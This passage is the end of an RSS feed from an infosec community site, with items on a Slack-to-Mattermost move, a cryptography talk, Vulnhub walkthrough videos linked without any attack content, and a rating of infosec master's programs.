&lt;p&gt;GitHub Issue: &lt;a href=&quot;https://github.com/PowerShell/PowerShell/issues/7719&quot;&gt;https://github.com/PowerShell/PowerShell/issues/7719&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Kali: &lt;a href=&quot;https://bugs.kali.org/view.php?id=4958&quot;&gt;https://bugs.kali.org/view.php?id=4958&lt;/a&gt;&lt;/p&gt;
</description>
            <pubDate>Tue, 25 Sep 2018 00:00:00 +0000</pubDate>
        </item>
        
        <item>
            <title>Down with Slack. Mattermost FTW!</title>
            <link>/community/2018/03/27/mattermost_ftw.html</link>
            <guid isPermaLink="true">/community/2018/03/27/mattermost_ftw.html</guid>
            <description>&lt;p&gt;Many of you may already know this, but as of March 15, 2017 NetSecFocus decided to migrate our community to our own Mattermost server. There were a few reasons for this with the main reasons being message retention in Slack. At our volume messages were only lasting for a maximum of 10 hours which made it impossible to search for anything meaningful. Due to this and the impossibility of paying about $12k USD/month for Slack we decided to ditch it for something better.&lt;/p&gt;

&lt;p&gt;After many months of testing various chat platforms, we decided Mattermost was the best compatible for us. Since it’s open source, we could also make some customizations that make it fit us even better than Slack ever will.&lt;/p&gt;

&lt;p&gt;On March 24, 2017, we deleted our old Slack workspace. RIP&lt;/p&gt;

&lt;p&gt;If you haven’t joined us on Mattermost yet, please do! You can connect to us at https://chat.netsecfocus.com/join. Should you have any issues connecting to that at work, you can also use https://mm.netsecfocus.com/join to bypass some proxies looking for the word “chat” in the hostname. You can use the web app, desktop or mobile apps as well. Some of our users have reported that the Android beta app has been more stable for them. Those of you thinking “omg another app I have to install” or “omg another browser tab”, well, you can look into using http://rambox.pro to concatenate all of your messaging into one app! For you IRC/terminal lovers out there, we haven’t left you behind like Slack has! You can use Matterhorn to connect to us after sign up: https://github.com/matterhorn-chat/matterhorn&lt;/p&gt;

&lt;p&gt;We thank our community for growing so large over the last 1.5 years and we hope to grow even larger and build something truly valuable in our industry. We’ll see you on Mattermost!&lt;/p&gt;
</description>
            <pubDate>Tue, 27 Mar 2018 17:00:00 +0000</pubDate>
        </item>
        
        <item>
            <title>Crypto 101: The Basics</title>
            <link>/crypto/tutorial/2017/06/09/crypto_101.html</link>
            <guid isPermaLink="true">/crypto/tutorial/2017/06/09/crypto_101.html</guid>
            <description>&lt;p&gt;Well I finally got my finger out and put together the first in a series of talks on crypto. Thank you for those that joined live and for the subsequent feedback.&lt;/p&gt;

&lt;p&gt;This session covered some of the principles of cryptography and the lexicon, then focused on what happens during a TLS run. We delved into the Diffie-Hellman secret agreement protocol (you should now know the difference) as well as the weaknesses, mitigation, and other related protocols.&lt;/p&gt;

&lt;p&gt;The whole recording is &lt;a href=&quot;https://youtu.be/fd4u6GseRzc&quot;&gt;here&lt;/a&gt; and I will be making the slides available when I find a decent host that isn’t that awful LinkedIn one. In the meantime you can tap me up on slack and I’ll chuck them over (there is a bonus set of slides at the bottom of the deck that cover RSA too).&lt;/p&gt;

&lt;p&gt;Next time we’ll be working our way further into our TLS ciphersuite and will be looking at symmetric encryption. Exciting.&lt;/p&gt;

&lt;p&gt;Any questions, feedback, abuse: hit me on slack or twitter &lt;a href=&quot;https://twitter.com/TunnyTraffic&quot;&gt;@TunnyTraffic&lt;/a&gt;.&lt;/p&gt;
</description>
            <pubDate>Fri, 09 Jun 2017 17:00:00 +0000</pubDate>
        </item>
        
        <item>
            <title>Vulnhub Video Walkthrough Series: Skytower</title>
            <link>/vulnhub/2017/03/11/vulnhub_skytower.html</link>
            <guid isPermaLink="true">/vulnhub/2017/03/11/vulnhub_skytower.html</guid>
            <description>&lt;iframe width=&quot;1280&quot; height=&quot;720&quot; src=&quot;https://www.youtube.com/embed/XqYtDDZTG6U&quot; frameborder=&quot;0&quot; allowfullscreen=&quot;&quot;&gt;&lt;/iframe&gt;
&lt;p&gt;&lt;br /&gt;
VM Link - &lt;a href=&quot;https://www.vulnhub.com/entry/skytower-1,96/&quot;&gt;Skytower 1.96&lt;/a&gt;&lt;/p&gt;

&lt;hr /&gt;
</description>
            <pubDate>Sat, 11 Mar 2017 17:00:00 +0000</pubDate>
        </item>
        
        <item>
            <title>Vulnhub Video Walkthrough Series: Kioptrix 1.1</title>
            <link>/vulnhub/2017/03/11/vulnhub_kioptrix1-1.html</link>
            <guid isPermaLink="true">/vulnhub/2017/03/11/vulnhub_kioptrix1-1.html</guid>
            <description>&lt;iframe width=&quot;1280&quot; height=&quot;720&quot; src=&quot;https://www.youtube.com/embed/D7Klu9N5wuA&quot; frameborder=&quot;0&quot; allowfullscreen=&quot;&quot;&gt;&lt;/iframe&gt;

&lt;p&gt;&lt;br /&gt;
VM Link - &lt;a href=&quot;https://www.vulnhub.com/entry/kioptrix-level-11-2,23/&quot;&gt;Kioptrix 1.1&lt;/a&gt;&lt;/p&gt;

&lt;hr /&gt;
</description>
            <pubDate>Sat, 11 Mar 2017 17:00:00 +0000</pubDate>
        </item>
        
        <item>
            <title>Rating Infosec Relevant Masters Programs</title>
            <link>/training/development/certifications/2017/03/08/rating_infosec_masters.html</link>
            <guid isPermaLink="true">/training/development/certifications/2017/03/08/rating_infosec_masters.html</guid>
            <description>&lt;p&gt;This post will delve into the masters degree programs currently offered nationwide within the US that have relevance to an infosec professional trying to get a leg up in their career. The goal is to remain as objective as possible and provide a single offering considered as the “best” choice within its relevant category.&lt;/p&gt;

&lt;h3 id=&quot;infosec-focused&quot;&gt;Infosec Focused&lt;/h3&gt;
&lt;h4 id=&quot;sans-msise&quot;&gt;SANS MSISE&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Reason:&lt;/strong&gt; This masters degree will offer you a level of exposure to information security, in a very practical and applicable sense, that is unparalleled by any other degree program. This exposure to the information security field, both as a whole and in the specialty you choose to pursue, also offers significant networking opportunities and a chance to achieve one of the most respected certifications: the GSE (a capstone and requisite for the degree).&lt;br /&gt;
&lt;strong&gt;Delivery:&lt;/strong&gt; Hybrid, in-person and online.&lt;br /&gt;
&lt;strong&gt;Costs:&lt;/strong&gt; ~$20k-45k (depending on work-study and transferables).&lt;/p&gt;

&lt;hr /&gt;

&lt;h3 id=&quot;compsci-focused&quot;&gt;CompSci Focused&lt;/h3&gt;
&lt;h4 id=&quot;georgia-tech-oms-cs&quot;&gt;Georgia Tech OMS CS&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Reason:&lt;/strong&gt; Its accessibility, associated costs, delivery platform, brand name, and high quality of material all conspire to make this one of the most solid choices available.&lt;br /&gt;
&lt;strong&gt;Delivery:&lt;/strong&gt; Online&lt;br /&gt;
&lt;strong&gt;Costs:&lt;/strong&gt; ~$16k&lt;/p&gt;

&lt;hr /&gt;
&lt;h3 id=&quot;efficiency-focused&quot;&gt;Efficiency Focused&lt;/h3&gt;
&lt;h4 id=&quot;wgu&quot;&gt;WGU&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Reason:&lt;/strong&gt; This university cannot get enough props for the successes they’ve made in their stated goal: offering a quality degree that caters to the working professional. Unbeatable in the objective metrics of time-to-complete, associated costs, and employability. Regionally accredited, this school often seems too good to be true, with a price model that allows you unlimited access to any and all classes upon enrollment for 6 month periods, allowing documented cases of individuals achieving their masters degrees in only 6 months’ time.&lt;br /&gt;
&lt;strong&gt;Delivery:&lt;/strong&gt; Online&lt;br /&gt;
&lt;strong&gt;Costs:&lt;/strong&gt; ~$3k-16k&lt;/p&gt;

&lt;hr /&gt;
&lt;p&gt;&lt;br /&gt;
- Kalabaster&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Work-in-progress: Last Updated 2017-03-08&lt;/em&gt;&lt;/p&gt;
</description>
            <pubDate>Wed, 08 Mar 2017 16:00:00 +0000</pubDate>
        </item>
        
    </channel>
</rss>